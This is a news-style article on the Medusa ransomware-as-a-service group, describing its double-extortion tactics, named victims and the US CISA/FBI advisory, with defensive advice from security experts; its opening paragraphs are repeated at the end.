Medusa, a criminal gang offering a sophisticated ransomware-as-a-service (RaaS) variant, has caused US authorities to issue an urgent cybersecurity advisory warning, as the malware is increasingly used to target critical national infrastructure.
RaaS, where attackers lease their capabilities to private bidders, is not a new phenomenon but the variant from Medusa is notable for its sophistication, scale and “double extortion” methods, according to the joint advisory from the US Cybersecurity and Infrastructure Security Agency and the FBI.
What we know about the Medusa ransomware-as-a-service variant
The Medusa variant was first used in 2021, but more recently has been linked to over 300 cyberattacks on critical infrastructure, including attacks on organisations in the medical, education, legal, technical and manufacturing sectors.
Attackers aren’t just encrypting the files of their targets, they are stealing their data and then threatening to release it publicly on Medusa’s leak site if the victims don’t pay the ransom. The site even sports a menacing countdown ticker.
The data in question is often very sensitive. The Minneapolis School District fell victim to a ransomware attack in February this year resulting in highly sensitive student and teacher information being published on the internet, including abuse allegations.
Medusa uses its blog to publicly auction stolen data, to shame and increase pressure on its victims
In January, Gateshead council suffered an attack by Medusa and in February, attackers claimed to have stolen 2.275 terabytes of data from HCRG Care Group, formerly Virgin Care. Medusa threatened to sell the stolen information for $2m (£1.54m) or delete the data for the same fee.
“Medusa has extremely aggressive extortion tactics,” says Boris Cipot, a senior security engineer at Black Duck, a cybersecurity firm. “Ransoms are tailored to the victim’s profile and Medusa uses its blog to publicly auction stolen data, to shame and increase pressure on its victims.”
These tactics, combined with the tool’s ability to cripple infrastructure, has made Medusa a potent threat, particularly for high-impact, public sector targets. According to Cipot, Medusa’s tactics will be a major test of the resilience of critical organisations.
Stolen data is often leaked to multiple locations, so cybersecurity professionals cannot simply monitor Medusa’s data-leak website on the dark web. Data may be available for download on Telegram or even on established social media platforms such as X.
Danny Howett is technical director at CyXcel, an attack-response firm, which monitors more than 10,000 channels on Telegram. “Just as cyber gangs are sharing zip or archive files on the dark web, those files are also being pushed to Telegram for anyone to download,” Howett says, complicating incident response for affected organisations.
He adds that the distributed nature of RaaS, where anyone can use the tools, makes matters difficult for authorities to pinpoint the criminals at the organisation’s core or slow the tide of attacks. But Medusa’s appearance on Russian-language cybercrime forums has raised suspicions that at least some affiliates are located in Russia.
“When there are affiliates, it’s much more difficult to say the attackers are from one group or region,” he adds, pointing to the cybercriminal group LockBit, which had affiliates arrested in Ukraine, Poland, the Netherlands and the UK.
How Medusa RaaS works
A recent report from BlackFog, a cybersecurity company, found that Medusa is now the third-largest ransomware variant – and it’s still growing. According to Darren Williams, CEO at BlackFog, part of the group’s success may be fuelled by AI systems, which are helping attackers train their engines to be “more targeted and more effective”.
“They use AI to perform phishing operations and hack into workstations and they’re getting a lot of success out of it,” says Williams.
Once the attackers have gained access to an organisation, they use so-called ‘living off the land’ (LotL) techniques to further exploit systems and spread malware.
LoTL attacks use commonly used components in victims’ IT infrastructure, such as Microsoft Powershell, the Windows configuration tool, to spread it to other devices. “This is very hard to detect, because you’re effectively using the tools that are already on the machines,” adds Williams.
Medusa ransomware: the main takeaways for cyber leaders
The Medusa developers appear to rely on an ecosystem of initial-access brokers (IABs) to gain entry to compromised networks, says Casey Ellis, founder of Bugcrowd, a cyber security firm. In contrast to another recent entrant to the ransomware market, FunkSec, Medusa seems to be going after high-ticket payments in the range of $100,000 (£77,000) to $1m (£770,000).
Ellis says its reliance on access brokers highlights the importance of “vigilance around public-facing initial-access vectors” – unpatched systems, poor web-coding, configuration mistakes and shadow IT – as well as strong cyber hygiene for access credentials and tokens. Attackers have also been known to compromise systems in advance of an attack to scope out weaknesses or potentially lucrative data.
“The bad guys are often already on the device,” says Williams. “You can do a lot of damage by getting behind protection and running reconnaissance – it’s the keys to the kingdom. So people might think they’ll stop them. But the attackers might already be there.”
To protect against variants such as Medusa, the go-to ransomware tactics apply, says Cipot. That means isolating critical systems with network segmentation, to prevent lateral movement across networks. Backups, with immutable storage that can’t be edited or altered, can prevent malicious attempts at encryption. And he advises organisations to deploy endpoint and network monitoring and detection to spot unusual activity – particularly around remote desktop access tools, such as Anydesk.
“Think of cybersecurity as a living organism where threats adapt and usually overcome the given security obstacles if those obstacles do not also evolve,” Cipot says. “User education and fire drills are necessary too. Make sure your users understand why they must adhere to more strict rules, test your mitigation and worst-case scenario plans, and adopt them where needed.”
Just as Perseus used a reflective shield to defeat the snake-haired gorgon of Greek mythology, organisations seeking to defend themselves against this more recent Medusa might do well to look in the mirror.
Medusa, a criminal gang offering a sophisticated ransomware-as-a-service (RaaS) variant, has caused US authorities to issue an urgent cybersecurity advisory warning, as the malware is increasingly used to target critical national infrastructure.
RaaS, where attackers lease their capabilities to private bidders, is not a new phenomenon but the variant from Medusa is notable for its sophistication, scale and “double extortion” methods, according to the joint advisory from the US Cybersecurity and Infrastructure Security Agency and the FBI.
